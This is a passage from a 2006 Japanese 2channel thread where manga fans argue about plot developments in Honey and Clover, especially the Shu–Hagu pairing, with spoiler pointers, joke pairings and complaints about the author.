そうだけど?結局何が聞きたいんだよ

111 :花と名無しさん:2006/07/16(日) 19:22:33 ID:???0
9巻のネタバレもおながい…。


112 :花と名無しさん:2006/07/16(日) 19:34:37 ID:???0
>>110
すいません、確認したかっただけです。

>>111
過去ログ見ればありそうじゃないですか?

113 :花と名無しさん:2006/07/16(日) 19:39:32 ID:???0
コミック派だったので今日9巻を読んで
おお!森はぐなのか?と思い、続きどうなる??と思ってここにキタ。

修かよー!!
   。 。
  / / ポーン!
( Д )

いや、別に修でもいいんだけどさーだったらもうちょっとそれっぽいフラグたててくれとけよ。
犯人はヤスかよ。

114 :花と名無しさん:2006/07/16(日) 19:44:48 ID:???0
   。 。
  / / ポーン!
( Д )

ってカワエエな。

コミック派でここ来て修はぐ!?ってなる人続出の悪寒

115 :花と名無しさん:2006/07/16(日) 19:48:43 ID:???0
〜9巻(〜chpter60)を読んで続きが知りたい方〜

chapter61 >>9-11
chapter62 >>14>>16-17
chapter63 >>19

chapter64は今月末です。

116 :花と名無しさん:2006/07/16(日) 19:52:39 ID:???0
>>112
うん、過去ログさかのぼってるんだけど
少女漫画板って、ネタバレはネタバレスレに書かれることもあるので…。

でも人に頼ってばっかりなのは
カバミと一緒になってしまうから
頑張って探すわ。

117 :花と名無しさん:2006/07/16(日) 19:56:02 ID:???0
>>113
ネットで「森はぐ」で検索して
見つかる個人サイトをかたっぱしから見ると癒されるよ。
ガンガレ。

最初にネットで「ハチクロ ネタバレ」で検索したら
上のほうに出てくるブログでは
コーラスのここ3ヶ月の展開に
キャーキャー喜んだり
若者組は恋愛から撤退〜、プッ、若者じゃあ頼りないもんね〜
みたいな内容の(原文のままではない)主婦の感想が
出てきて激しく萎えた…。
(ΦдΦ)†呪いマース

118 :花と名無しさん:2006/07/16(日) 19:56:22 ID:???0
修に恋愛感情があるって事が修はぐ離ればなれフラグなんじゃない?
いつかはぐも恋愛感情に変わるのかもしれないけど
それがありえないとすればお互い長い間はいっしょにいれないんじゃないかな。
修の恋愛感情に気づいてるけど答えることができなくてつらいはぐ。
そんな状態ははぐの為に良くない‥と自分から離れる修。
とか…無理無理か〜。

119 :花と名無しさん:2006/07/16(日) 19:59:40 ID:???0
確かに、修とはぐってひどいよね!
1巻から9巻までは、一体!?って感じだよね!
修は森田の気持ちも、はぐの気持ちも分かってるはずなのに。
納得できん!
これで、修はぐで終ったら、ハチクロ自体嫌いになりそう。

120 :花と名無しさん:2006/07/16(日) 20:11:47 ID:???0
ウミノさん日記、初期(2002年)の頃は
今よりもっと漢字が多いんだね。


121 :花と名無しさん:2006/07/16(日) 20:12:59 ID:???0
>>119
1〜9巻はハチミツとクローバー、10巻はハチミツと苦労話
別の漫画だと思うしか…

122 :花と名無しさん:2006/07/16(日) 20:18:30 ID:???0
>>118でよろしくお願いします、ウミノ。

123 :花と名無しさん:2006/07/16(日) 20:18:36 ID:???0
漢字能力も逆走かよ!

124 :花と名無しさん:2006/07/16(日) 20:19:30 ID:???0
逆走☆言語能力

125 :花と名無しさん:2006/07/16(日) 20:23:58 ID:???0
現状が納得できない理由
1.修がはぐに恋愛感情をもっているような描写がなかった。
2.森田、竹本が引き際あっさりしすぎ
3.ロリコンカミングアウトに対する周囲の反応が暖かいのが気に食わない

つまりだ、
はぐ怪我する→修の過保護が過剰になる→
ロリコンカミングアウト(はぐに告白)→周囲の反応が引き気味になる(山田猛反対)→
森田&竹本vs修→以下次号に続く

みたいな展開だったら叩かれなかったのに…



126 :花と名無しさん:2006/07/16(日) 20:25:00 ID:???0
なんでひらがなふやしたんだろう?
いいとしこいてふしぎちゃんぶりたいの?
うみのさんのにっきひたっちゃってていたい。

127 :花と名無しさん:2006/07/16(日) 20:26:29 ID:???O
9巻すげー良かったんだけど…超展開が待ってるのか…。

自分キューコミ時代から読んでるけど、元々重いのが好きだから今みたいな内容も平気だ。
許せないのは山田の退化くらい。
うだうだ悩んでるのはむしろ好きなのに見た目のロリ化がキモい。

128 :花と名無しさん:2006/07/16(日) 20:27:15 ID:???0
>>125
それは・・・リアルだ。
まあストーカーいるしロリコンもありだよね。
山田猛反対、が見たかった。

129 :花と名無しさん:2006/07/16(日) 20:30:26 ID:???O
ぶっちゃけブログじゃ 修ちゃんいいよ〜の意見かなり多いから
今の展開嫌な人はこのスレを見た方がよろしいかとw

130 :花と名無しさん:2006/07/16(日) 20:30:37 ID:???O
はぐが怪我した時「それなんて亜/弓さん?」って思ったよ。
唐突な不幸で釣るような作者だったかな?と疑問だったけど、この作品ってメンヘラ気味の女がちやほやされるから仕方ないか

131 :花と名無しさん:2006/07/16(日) 20:30:45 ID:???0
普通は引くよな
父親顔でいた男が
まさに男の目で見てたんだから
一緒の部屋で寝泊りとか普通にしてたしな

132 :花と名無しさん:2006/07/16(日) 20:30:53 ID:???0
山田って森田が幸せになれるように願ってたんじゃなかった?
森はぐでは幸せになれないって見極めてたってことかな。
んなわけないよね。やっぱり修はぐ萌えだよね。

133 :花と名無しさん:2006/07/16(日) 20:31:30 ID:???0
修に恋愛感情もたれて平然としてるはぐが不満。
「すきだ!はぐ!」
   ↓
「修ちゃんは好きだけど、家族みたいな・・・どうしようあゆ?(オロオロ」
   ↓
「うーんこのままロリコンに世話させとくのはまずいわよね、真山に森田さん探してもらおう」

134 :花と名無しさん:2006/07/16(日) 20:33:12 ID:???0
シリアスは森田話で充分だったわ。

135 :花と名無しさん:2006/07/16(日) 20:36:17 ID:???0
>>129
そうなの?ちょっとびっくりだ。やっぱり不幸シチュエーションで純愛って萌えるのか?
ストーリーが不自然でも。

136 :花と名無しさん:2006/07/16(日) 20:38:34 ID:???O
>>120
同人女ってあほっぽいひらがな文体の日記書く椰子多いから…………
あとは俺僕口調…………

137 :花と名無しさん:2006/07/16(日) 20:39:36 ID:???0
>>133
セリフがはぐ(8巻までの)と山田(初期の)の特徴とらえててすげえw
なんか目に浮かぶようだよ、
半泣きのはぐみとあごに手を当てて考えてる山田が。

138 :花と名無しさん:2006/07/16(日) 20:40:15 ID:L2/+Ph/H0
>>127
9巻までならクライマックスに向けた展開として悪くないんだけどね…
まさかハチクロで「地獄」なんて言葉が…
400年の時間が欲しいってとこで一応10巻への伏線はできてるんだけど
なんだかねえ。まだおいらはラスト森田がかっさらって、臭がピエロになること信じてるよ。
臭はそのほうがカッコイイと思う。

139 :花と名無しさん:2006/07/16(日) 20:41:44 ID:???0
>>136
そのうち僕とか言い出したらどうしよう…

140 :花と名無しさん:2006/07/16(日) 20:41:55 ID:???0
森はぐ…で検索すると
臭はぐマンセーじゃない人の日記がザクザク出てくるよ。

うっかり臭×はぐマンセーの人に見つかって
「原作に文句言うなんて、痛い管理人ですね」と
火病されないように
まわりに気をつかった文章にしてる人が多いけどな。

あと、Not Found になってるサイトや
ハチクロコンテンツがなくなってるサイトも
多い。

141 :花と名無しさん:2006/07/16(日) 20:43:44 ID:???0
>>133
そこでたけのこが
「先生どうしてこんなときに・・・これでは彼女が耐えられない」

142 :花と名無しさん:2006/07/16(日) 20:43:47 ID:???0
>>120
ウミノさんみたいな文章は
同人女系じゃなくて
「ほっこり主婦系」だよ。

「雅姫さん ハグオーワー リネン」
「ハグオーワー ニーム ハンドメイド」
などでググってみ?

ウミノさんみたいな文がワラワラ出てくるから。

143 :花と名無しさん:2006/07/16(日) 20:44:47 ID:???0
ハグオーワーって?

144 :この人は 今・・・:2006/07/16(日) 20:46:51 ID:???0
755 :花と名無しさん :2005/07/13(水) 04:21:17 ID:gdfrUjJo0

ようやく最新号読んだ。 山田と真山をくっつける工作(つーか下準備)が始まったと読んだ。
合コンで「女の子をお持ち帰りする真山クン」を明確に否定して、
真山童貞説(つーか他の女に手出ししまくるような真山を否定)を匂わせている。

そもそもハチクロは少女漫画だし、そこまで文学性を高める必要なんてない。
はぐと森田(あるいは竹本)、山田と真山がくっついておしまい。
身の回り半径1メートルで完結する世界なんだから。
「くっつき」エンドは少女漫画的には一番妥当で無難な締めくくり方でしょう。

760 :花と名無しさん :2005/07/13(水) 06:26:29 ID:gdfrUjJo0

なんだか漏れの意見に反発したがるような人が大勢いるようで楽しい(・∀・)イイ!!
だから、お互い最終回までこのログをとっておこう。 結末がどっちになるかお楽しみってことでヽ(・∀・)ノ

自分のカキコが少々意味不明なところがあるので補足するけど、
>そもそもハチクロは少女漫画だし、そこまで文学性を高める必要なんてない。
以前、「ハチクロはビルドゥングスロマン(教養小説)だ」って
評論を目にしたんだけど、そんなたいそうなものかって意味を含ませてる。
なんでも「ハチクロでは、竹本その他の登場人物が、恋や友情などを経て成長してゆく(以下略
そういうアナクロな物語が現代(いま)の女性にうけている」んだって( ´,_ゝ`)プッ

そもそもビルドゥングスロマンって、ヴィルヘルム・マイスター@ゲーテみたいな
くだらない作品しかないけど、それでも少女漫画なんかよりはもっと波があるぞ。
つーか、ハチクロで誰か成長したか(・∀・)??
「塔の結社」の連中に修了証書でももらったか(・∀・)??
はぐちゃんはミニヨンでいきなり死ぬのか(・∀・)??

漏れはおまいら2ちゃんねらーが束になったよりも大量の本を読んできた。
それなりの文学的バックボーンはある。だから、お互い自信があるなら 最終回(そう遠くないだろう)までここのログを保管しようヽ(・∀・)ノ

145 :花と名無しさん:2006/07/16(日) 20:47:45 ID:???O
>>125
つうか、はぐも修も自立しなきゃという自覚を匂わせる描写までやってきて
この期に及んではぐメンヘラに修ロリコンに………

146 :花と名無しさん:2006/07/16(日) 20:50:00 ID:???0
最終回、帰ってきたローマイヤー先輩がはぐに一目ぼれし、田舎にさらっていきます

147 :花と名無しさん:2006/07/16(日) 20:50:18 ID:???0
>>144
バロス

148 :花と名無しさん:2006/07/16(日) 20:50:19 ID:???0
>>144
ちょwwww
てかもうこのスレにはいないんじゃまいかww

149 :花と名無しさん:2006/07/16(日) 20:51:12 ID:???0
森はぐで検索してみたらNot Foundばっかで笑ってしまった。

150 :花と名無しさん:2006/07/16(日) 20:51:39 ID:???0
>>144

い・・・痛すぎる

(そして腹イテェwwwww)

151 :花と名無しさん:2006/07/16(日) 20:53:15 ID:???0
>>144
まあでも、誰も成長してないってのは合ってるな。

竹本は自分の道を見つけて覚悟決めたかと思いきや、
たかが好きなこのケガで行くのやめようかなーとか思っちゃったわけだしね。

152 :花と名無しさん:2006/07/16(日) 20:55:09 ID:???0
>>146
そうなっても私もう驚かない。

153 :花と名無しさん:2006/07/16(日) 20:58:51 ID:???O
もりたとはぐがくっつかなかったらブクオフ逝きケテーイしますた

154 :花と名無しさん:2006/07/16(日) 20:59:48 ID:???0
ここまできたら腐究の迷作にするしかない。
最終回までに真山はぐ、森田リカ、竹本山田にもってったら神。

155 :花と名無しさん:2006/07/16(日) 21:01:20 ID:???0
修は余ったから同じく後半戦から突入してきた野宮でいいや。

156 :花と名無しさん:2006/07/16(日) 21:01:44 ID:???0
>>154
オサレはどこへ持ってけば神?

157 :花と名無しさん:2006/07/16(日) 21:02:14 ID:???O
真山はぐとか…













見てぇwww

158 :花と名無しさん:2006/07/16(日) 21:02:57 ID:???0
オサレは
はぐに「あなたずるいわよ!」って言ってた先生とくっついたらいいんだと思います。

159 :花と名無しさん:2006/07/16(日) 21:03:51 ID:???0
>>153
ブックオフにズラリとハチクロが並ぶ日も遠くないな

160 :花と名無しさん:2006/07/16(日) 21:03:59 ID:???0
年の差ありすぎwww

161 :花と名無しさん:2006/07/16(日) 21:04:11 ID:???0
ウミノ先生的には森田×竹本

162 :花と名無しさん:2006/07/16(日) 21:04:32 ID:???O
本気で膿野、声優萌えで臭はぐにしやがってヽ(`Д´)ノ

163 :花と名無しさん:2006/07/16(日) 21:05:54 ID:???0
そういえば真山はぐって発想がまったくなかった。接点少ないもんな。

164 :花と名無しさん:2006/07/16(日) 21:06:33 ID:???O
はぐって絶対真山のこと嫌いだと思う

165 :花と名無しさん:2006/07/16(日) 21:07:07 ID:???0
はぐは自分に興味無いやつはみんな嫌い。

166 :花と名無しさん:2006/07/16(日) 21:07:44 ID:???0
森田山田が見てえ
二人とも初期の性格で

167 :花と名無しさん:2006/07/16(日) 21:08:47 ID:???O
皆でウミノに感想送ったらイイジャマイカ

168 :花と名無しさん:2006/07/16(日) 21:09:10 ID:???0
森田はたいして変わってないような?
ギャグは無くなったけどもともと山田には真摯な対応してたし。

169 :花と名無しさん:2006/07/16(日) 21:09:59 ID:???0
だれかここ印刷して送ってやれよw

170 :花と名無しさん:2006/07/16(日) 21:10:50 ID:???0
過去ログ送ればいいよw

171 :花と名無しさん:2006/07/16(日) 21:11:41 ID:???O
>>144
本読んでるからって本人のレベルが上がるわけじゃないからねw
活字に騙されるくらいなら本なんか読まなくていい

172 :花と名無しさん:2006/07/16(日) 21:11:53 ID:???0
てか見てんじゃない?

173 :花と名無しさん:2006/07/16(日) 21:12:24 ID:???O
ウミノへ

ブックオフにたくさん漫画があって、多くの人が漫画見れて良かったですね












(・∀・)

174 :花と名無しさん:2006/07/16(日) 21:12:57 ID:???0
>>165
そう思う。
やな女だよパグミ。

175 :花と名無しさん:2006/07/16(日) 21:13:46 ID:???0
パグミ嫌い

176 :花と名無しさん:2006/07/16(日) 21:15:51 ID:???O
たけのこや、臭に散々マグは森田が好きって言わせておいて、実は臭ちゃんが…とかおかし杉だろw


177 :花と名無しさん:2006/07/16(日) 21:16:03 ID:???0
今まで普通にかわいいなって思ったけど、
人生もらおうとし始めてからが許せない。
修ちゃんに迷惑かけないように田舎帰るとかなんか偉いこと言ってたじゃん…

178 :花と名無しさん:2006/07/16(日) 21:17:36 ID:???0
たけのこが修に「ちゃんと言え」とか言ってるのは
森田にとられるよりは修の方がマシって気持ちからなのか?
自分探しでみつけた自分はずいぶんと醜いでつね。

179 :花と名無しさん:2006/07/16(日) 21:18:48 ID:???0
タケノコって成長し過ぎると食えんからなぁ

180 :花と名無しさん:2006/07/16(日) 21:19:13 ID:???O
wwwwwwww

181 :花と名無しさん:2006/07/16(日) 21:20:27 ID:???0
>>154
その中だとなぜか
一番接触の無かった森田リカが一番いけそうな気がするw

182 :花と名無しさん:2006/07/16(日) 21:22:01 ID:???O
リカと森田はあわなそうだw
森田がしつこすぎて、リカノイローゼにw

183 :花と名無しさん:2006/07/16(日) 21:24:06 ID:8iWegQN2O
修の今までの親バカギャグも今となっちゃただの…………

184 :花と名無しさん:2006/07/16(日) 21:24:06 ID:XxBCEhvv0
>>178
> 自分探しでみつけた自分はずいぶんと醜いでつね。
たしかに竹本は汚くなった。
はぐの看病にかこつけてヒモになろうとしたり
なんかムカつくんだよね。

185 :花と名無しさん:2006/07/16(日) 21:24:22 ID:???0
パグミはたこのこが告った時になんで曖昧な返事をしたんだ?
キープ君?

186 :花と名無しさん:2006/07/16(日) 21:26:00 ID:???O
森田がかわいそすぎるお(゜;Д;゜)

187 :花と名無しさん:2006/07/16(日) 21:26:55 ID:???0
>>185
圏外過ぎて答えようがなかったから

188 :花と名無しさん:2006/07/16(日) 21:28:53 ID:???0
タケノコの旅から帰ってきた後の森田への態度が非常にむかつく。


189 :花と名無しさん:2006/07/16(日) 21:29:10 ID:???0
>>185
498:花と名無しさん :2006/06/30(金) 15:15:54 ID:???0
森田の芸術性には惹かれるし刺激になるけど
アテクシの為に100%費やしてくんないし。
その点、修ちゃんは昔からかゆいとこまで手が届くくらい
アテクシの為に尽くしてくれるのよね。

竹本?貧乏で甲斐性なしはアウトオブ眼中ですよ。

190 :花と名無しさん:2006/07/16(日) 21:30:12 ID:???0
やっぱ貧乏はだめかwww

191 :花と名無しさん:2006/07/16(日) 21:30:36 ID:???0
ところでなんでタケノコは森田が帰国して病院に走ったのをあわてて追ったの?

192 :花と名無しさん:2006/07/16(日) 21:30:56 ID:XxBCEhvv0
>>185
好きだといっただけでつきあってほしいとは言ってない。
そもそも男女のつきあいに貪欲なら森田のキスとかからも
何か始まってもおかしくない。
今回(9巻)で森田は実質プロポーズしてるんだけど
これを断るはぐはなんかムカツク。


193 :花と名無しさん:2006/07/16(日) 21:34:51 ID:???O
成長や自立への布石を散々描写しといて唐突に………
怪我して手が動かなくなるなんてずるいイベントだよなぁ〜
さすがは作者の肩入れキャラクター。
メンヘラで白痴で甘やかされっ娘で悲劇のヒロインですかそうですか

いくら漫画だからってメンヘラ人間が甘やかされ過ぎ

194 :花と名無しさん:2006/07/16(日) 21:36:28 ID:???O
最終回驚愕のカポー
真山リカ、森田美和子、竹本エマ、修山田、ローマイヤはぐ


195 :花と名無しさん:2006/07/16(日) 21:38:03 ID:???0
>>188
同意
森田はたけのこに友情を感じてたようだが
たけのこは森田を敵対視してるだけのように思える。

196 :花と名無しさん:2006/07/16(日) 21:38:31 ID:???0
安易にキャラをメンヘルにするなって話
話を盛り上げるため?無茶な展開に納得させるため?
卑怯な感じ

197 :花と名無しさん:2006/07/16(日) 21:38:45 ID:???0
森田が山田に屋上から投げ落とされた時、森田が通常の人間なら死亡、またははぐ以上の怪我を負っているだろうな。
そして山田はタイーホ。

198 :花と名無しさん:2006/07/16(日) 21:40:37 ID:???O
はぐは怪我してヨカタって思ってるべYO
自分の将来のことに悩む→突然の怪我→怪我をしたことによって自立は無理→臭がパートナーに→はぐウマー→森田あぼーん

199 :花と名無しさん:2006/07/16(日) 21:40:52 ID:???0
>194
ローマイヤ先輩が不幸で無理です

200 :花と名無しさん:2006/07/16(日) 21:42:07 ID:LOetrCQbO
今9巻読んだー
なんでこんなに切ないの?(´・ω・`)

201 :花と名無しさん:2006/07/16(日) 21:42:23 ID:???0
>193
おまいみたいな奴は幸せになれなさそうだな…

現実にメンヘラ人間が甘やかされてたら何て言っちゃうのか心配だ

202 :花と名無しさん:2006/07/16(日) 21:45:31 ID:???0
やっぱクライマックスは主要人物の事故にかぎるね☆
セツナクテイイヨネー

203 :花と名無しさん:2006/07/16(日) 21:51:55 ID:???0
ネー

204 :花と名無しさん:2006/07/16(日) 21:53:10 ID:???0
そういえば映画の広告で40代主婦が
「結婚するなら竹本くんよと 中学生の娘に言いたい」
みたいなこと書かれてて笑ったw

205 :花と名無しさん:2006/07/16(日) 21:53:40 ID:???0
>>197
その話よく出るから自分なりに考えたみたんだけどさ、

ハチクロの登場人物はみんなゴム人間なんだよ。
だから森田みたいに落下するのは平気なんだけど、
原田みたいに焼けたり、はぐみたいに刺さるのはだめなんだよ。

納得した?

206 :花と名無しさん:2006/07/16(日) 21:54:08 ID:???O
>>107
自分達が住んでいた家を復元し元社長にあげる…
つまり森田のメッセージは
「親父を忘れるなんて許さねえ。親父と俺達が暮らしたその家に住み苦しむがいい」
というサド行為です

207 :花と名無しさん:2006/07/16(日) 21:54:52 ID:???O
>>201
オマエモナ

確かに怪我イベントはずるいと思うよ。簡単に悲劇展開できちゃうし。
周りからちやほやされても不自然にならないし。
だから盛り上げる為だけに怪我や不治の病系はやっちゃいけないんだよ。
うみのの場合は修とくっつける為の強引な展開だけど…。

208 :花と名無しさん:2006/07/16(日) 21:55:50 ID:???0
>>205
197じゃないけど…なるほど!www

209 :花と名無しさん:2006/07/16(日) 21:59:34 ID:???0
>>191
絵的に展開的に綺麗だから
プチ感動するから

210 :花と名無しさん:2006/07/16(日) 21:59:44 ID:???O
はぐは森田が好きだけどそれよりも、創作活動が大事ってこと?

211 :花と名無しさん:2006/07/16(日) 22:00:55 ID:???0
>>210
自分が大好きなだけです

212 :花と名無しさん:2006/07/16(日) 22:01:42 ID:???0
>>191
それ自分も謎
森田の暴走を止めようとしてるんだったら、
そこまで信用ない森田って・・・
「そのくらいは男でいたい」の意味がわからない〜

213 :花と名無しさん:2006/07/16(日) 22:03:51 ID:???O
森田の怪我はギャグにしてはぐの怪我は悲劇展開かよ。空気違い過ぎ。さすがはうみのタンの自己投影キャラ
アテクシカワイソス臭が漂ってきたな。


そもそもはぐはなんで都会に出てきたターザンみたいなキャラになったんだろうか。

214 :花と名無しさん:2006/07/16(日) 22:03:55 ID:???0
どさくさにまぎれてキャラ叩きや差別用語出す奴は現行ウミノと同じくらい痛い。

215 :花と名無しさん:2006/07/16(日) 22:04:23 ID:???O
はぐと森田が好きあってると思って、指くわえてそれを見てるのは駄目なんじゃないかと思ったんじゃないの?

自分は花も買えないし、はぐを守る力もないけれど、それでも男だからはぐの隣りにいたいと

216 :花と名無しさん:2006/07/16(日) 22:04:26 ID:???0
はぐは自分からは何もしないで、周りの人たちが
勝手に「俺を選べ」状態になったりしてるんだよね。
で、はぐ本人は決して決定打を口にしない。
ずるい女だよw

217 :花と名無しさん:2006/07/16(日) 22:05:03 ID:???0
>>16参照
竹本「森田にだけはとられるのは嫌だった。 …

218 :花と名無しさん:2006/07/16(日) 22:06:40 ID:???0
はぐみたいな女のどこがいいんだろ

219 :花と名無しさん:2006/07/16(日) 22:07:58 ID:???0
差別用語なんてあった・・・?
サドのことか

220 :花と名無しさん:2006/07/16(日) 22:09:33 ID:???0
みんなロリコン

221 :花と名無しさん:2006/07/16(日) 22:11:04 ID:???0
>>219
ゴム人間のことじゃないかな

222 :花と名無しさん:2006/07/16(日) 22:11:42 ID:???O
周りの男が熱くなってんのに無自覚天然☆女や
どうしましょとオロオロするだけで誰かを選んだりはっきりと拒絶したりしない女って嫌われヒロインというか
自分がないだけだよな


果物籠といい三角関係モノって大抵第三者とくっついたりして逃げるからイヤになる

223 :花と名無しさん:2006/07/16(日) 22:14:53 ID:???0
なんかみんな性格が悪くなっていくなぁ
自分は竹本とくっついて欲しかった人間だが、今なら森田が一番マシだ。

224 :花と名無しさん:2006/07/16(日) 22:15:14 ID:XxBCEhvv0
>>219
メンへラだろ

225 :花と名無しさん:2006/07/16(日) 22:16:33 ID:???0
白痴だろ

226 :花と名無しさん:2006/07/16(日) 22:16:37 ID:???0
>>205
なるほど!

227 :花と名無しさん:2006/07/16(日) 22:16:39 ID:???O
臭がはぐに、自分の気持ちを大事にして良いんだよって森田とくっつけば良いのに

228 :花と名無しさん:2006/07/16(日) 22:23:09 ID:???0
もともと、はぐの存在って「竹本森田が好きな女の子」ってだけで
はぐ単体には興味は無かったから、竹本森田とくっつかないなら
これ以上はぐエピソードはイラネ('A‘)
臭でも倉持君でも誰とどうなってもいいから
さっさとハチクロワールドから退場してくれ…
でもはぐ=作者だと言われてる現在
「はぐ、臭ちゃんと幸せになります☆」→Fin
になりそうでコーラス発売日が怖い・・・・・・
せめて最後は竹本森田真山エピで終わらせてくれ。

229 :花と名無しさん:2006/07/16(日) 22:23:12 ID:???0
>>222
>周りの男が熱くなってんのに無自覚天然☆女

このタイプの女、今、
女性2ちゃんねらーからは嫌われやすいストーリーの少女漫画や
乙女ゲー(ときメモガールサイドやテニスの王子様ゲームみたいの)
のファンからは、むちゃくちゃ大人気だよ。
その手のファンンサイト見たら
「天然主人公ちゃん大好きですぅ〜☆」みたいのばっかりだから。
そういう人には、臭×はぐもマンセーされると思う。

あと、今、ほっこり系の人が
(ハグオーワーttp://www.hugowar.com/は
 ほっこり主婦にとって教祖・教典のようなブランド)
ウミノ日記そっくりな文章書くって話も書いたけど
そういう人にも、臭×はぐは大マンセーだと思う。
ウミノと毒電波の波長がほっこり主婦には合うから。

230 :花と名無しさん:2006/07/16(日) 22:24:30 ID:???0
誰もくっつかなくていいよ
パグも山田もうざいし
男性キャラは性格破綻しちゃったし

231 :花と名無しさん:2006/07/16(日) 22:26:13 ID:???0
>>220
同意

232 :花と名無しさん:2006/07/16(日) 22:29:43 ID:???0
9巻は面白かったんだがなあ…
「コーラス」が休刊になって現連載は未完。
10巻全編書き下ろしで書き直せばいいじゃまいか?

233 :花と名無しさん:2006/07/16(日) 22:39:11 ID:???O
>>229
女性ねらーというより普通に自立した考えの女性じゃないか

そういえば同人女のドリーム小説主人公って無自覚天然☆が大人気だよなぁ…

234 :花と名無しさん:2006/07/16(日) 22:45:48 ID:???0
>>233
>女性ねらーというより普通に自立した考えの女性じゃないか

そういえばそうだね。
あなたの言うとおりだ。スマン。


>同人女のドリーム小説主人公って無自覚天然☆が大人気

あれ苦手…。

235 :花と名無しさん:2006/07/16(日) 22:47:25 ID:???0
カバ
カバミ
バグちゃん
(天才)カバボン
パグ

ふえゆく蔑称

236 :花と名無しさん:2006/07/16(日) 22:49:08 ID:???O
同人なんてどうでも良いよ、商業誌なんだから、納得出来るラスト…が難しいならせめて綺麗に終わらせて欲しい。

ムリか?…orz

237 :花と名無しさん:2006/07/16(日) 22:50:48 ID:???0
夢オチしかないな

238 :花と名無しさん:2006/07/16(日) 22:55:16 ID:???0
ちょっとごめん、はぐと修って近親相姦にはならないの?

239 :花と名無しさん:2006/07/16(日) 22:58:47 ID:???0
>238
花本修司のいとこの娘です

240 :花と名無しさん:2006/07/16(日) 22:59:17 ID:hGzReEbIO
はぐが無自覚天然で意志がないとかいってる人はものを作ることを知らないんだろうね。高校生か大学生か恋愛至上主義だからわからないのかなぁ?
価値観はそれぞれだから、どっちがいいとかいう意味ではないけど
ここみて、へえーと思った

241 :花と名無しさん:2006/07/16(日) 23:00:18 ID:???0
ハグオーワーって、はぐと何かをもじってるのかと思ったら
実在のブランドですか・・・

242 :花と名無しさん:2006/07/16(日) 23:04:13 ID:???O
>>240
はぐが無自覚天然☆だなんてどこにある?
そしてお前はもの作りを知ってんのかな?(掲示板でそういう発言は両刃の刃)
アテクシのハチクロやウミノテンテーに文句ゆうな!!!って言いたいならハッキリ言えば?

243 :花と名無しさん:2006/07/16(日) 23:06:03 ID:???0
>>240
そんなに嫌味っぽい言い方しなくてもいいんじゃ

244 :花と名無しさん:2006/07/16(日) 23:06:43 ID:???0
修ちゃん病気で倒れてアボンで遺書発見
修モノローグ
真山へ「リカを頼む」
リカへ「真山と幸せになれ」
山田へ「野宮を大切にしろ」
タケノコ「一人前の修復士になれ」
森田へ「金は返せなかったけど、はぐは返す」
はぐへ「夢をみさせてくれてありがとう。自分の気持ちに素直に生きろ」
10年後、完成した真山リカの美術館
庭に飾られた森田とはぐの彫刻
再会する6人




245 :花と名無しさん:2006/07/16(日) 23:06:49 ID:???0
大漁

246 :花と名無しさん:2006/07/16(日) 23:08:10 ID:???0
>239
ありがとう。
はとこって事かな…?

で、今気付いたんだけど、
普通に『いとこ』とか『妹』とかの設定にしないで
いとこの娘って設定にしたのは
万が一のときは修とはぐをくっつける事のできる伏線だった気がする。
たんに過保護な愛情を注ぐって設定なら
もっと近しい身内の方がすっきりするし。

ここまで邪推する自分がおかしいのか?

247 :花と名無しさん:2006/07/16(日) 23:13:09 ID:???0
人見知りの甘ったれ=はぐみ

社交性のある甘ったれ=山田


248 :花と名無しさん:2006/07/16(日) 23:13:18 ID:???0
無自覚天然なのと、ものを作ることって何か関係あるの?

249 :花と名無しさん:2006/07/16(日) 23:13:45 ID:???0
ハチミツ=甘ったれの意

250 :花と名無しさん:2006/07/16(日) 23:13:59 ID:???0
痛みを知らない子供が嫌い。
心をなくした大人が嫌い。
優しい漫画が好き。
バイバイ

251 :花と名無しさん:2006/07/16(日) 23:14:47 ID:???0
ロリコンキモイ

252 :花と名無しさん:2006/07/16(日) 23:16:29 ID:???0
>>246
案外、微妙な歳の差のごまかしって気もする。
たしか10歳差くらいだよね、はぐと修は。
そうすると修とはぐ父も最低10歳は差が出来ちゃうからそれちょっと不自然じゃない?
あとは修とはぐがイトコの場合、修は直接あのばあさんの息子だから、
あの不幸設定が成り立たなくなる・・・とか。

253 :花と名無しさん:2006/07/16(日) 23:16:34 ID:???O
>>248
キャラも理解しないでうみのタンの文句ゆうなってこと

更に言うならもの作りする椰子(うみの)の苦労なんてイパーン人の藻前らなんかに理解不能だってことさ。

254 :花と名無しさん:2006/07/16(日) 23:18:35 ID:???0
>>253
読者をなめんな

255 :花と名無しさん:2006/07/16(日) 23:18:48 ID:???0
釣り日和?

256 :花と名無しさん:2006/07/16(日) 23:19:37 ID:???0
>>205
なるほど

257 :花と名無しさん:2006/07/16(日) 23:19:49 ID:???0
羽海野日まであと40分

258 :花と名無しさん:2006/07/16(日) 23:20:41 ID:???0
>>253
ウミノの擁護してたのか。
はぐのこと言ってんのかと思ってたw

259 :花と名無しさん:2006/07/16(日) 23:20:44 ID:???0
はとこってのは大おじ・大おばの孫(=親がいとこ同士)だから違うんじゃないの
間違ってたらごめん

260 :花と名無しさん:2006/07/16(日) 23:20:54 ID:???0
理解不能っていうか
そもそもなんで読者が理解しなきゃいけないんだ。

261 :花と名無しさん:2006/07/16(日) 23:21:48 ID:Z+djdtrhO
ハチクロ読んだら恋したくなる。
元気になる。
それだけで十分じゃないかい?

262 :花と名無しさん:2006/07/16(日) 23:21:49 ID:???0
椰子とか藻前ってかなり久しぶりに見たな

263 :花と名無しさん:2006/07/16(日) 23:22:41 ID:???0
253はイパーン人じゃないのか

264 :花と名無しさん:2006/07/16(日) 23:22:50 ID:e2eah3lE0
うーん、まだ結末わかんなくない?
このまま修センセとくっつくなら、がっかりだけど・・・。
良作から、駄作にかわるかんじだね。
竹本や森田のエピソードがムダになるし・・・。

修がはぐの本当の気持ち気づいて、森田か竹本のもとに送りだすっていうのが理想だわぁ
べつに私はぐも山田も嫌いじゃないし、共感できるよ。

265 :花と名無しさん:2006/07/16(日) 23:23:53 ID:???0
>>264
だから
作品がこのまま終わると
決まった訳じゃないのに期待してたの違うからって
てのひら返したように熱狂的ファンだった人が
いらついて大騒ぎしてるだけなんだよ。

266 :花と名無しさん:2006/07/16(日) 23:24:29 ID:???0
自分は多分ここでは少数派の「はぐが誰ともくっつかず
ずっと修と生活すればいいのに(もちろん擬似親子として)」なんて希望を持ってた。
自分でもかなり変だと思ってたが、恋愛感情まで持ち出すウミノは私以上の変態だw

267 :花と名無しさん:2006/07/16(日) 23:24:49 ID:???0
>>264
かわいそうだけど竹本のもとにという選択肢は絶対に無いなw

268 :花と名無しさん:2006/07/16(日) 23:25:10 ID:???0
>>266
あ、同士発見www

269 :花と名無しさん:2006/07/16(日) 23:27:07 ID:???0
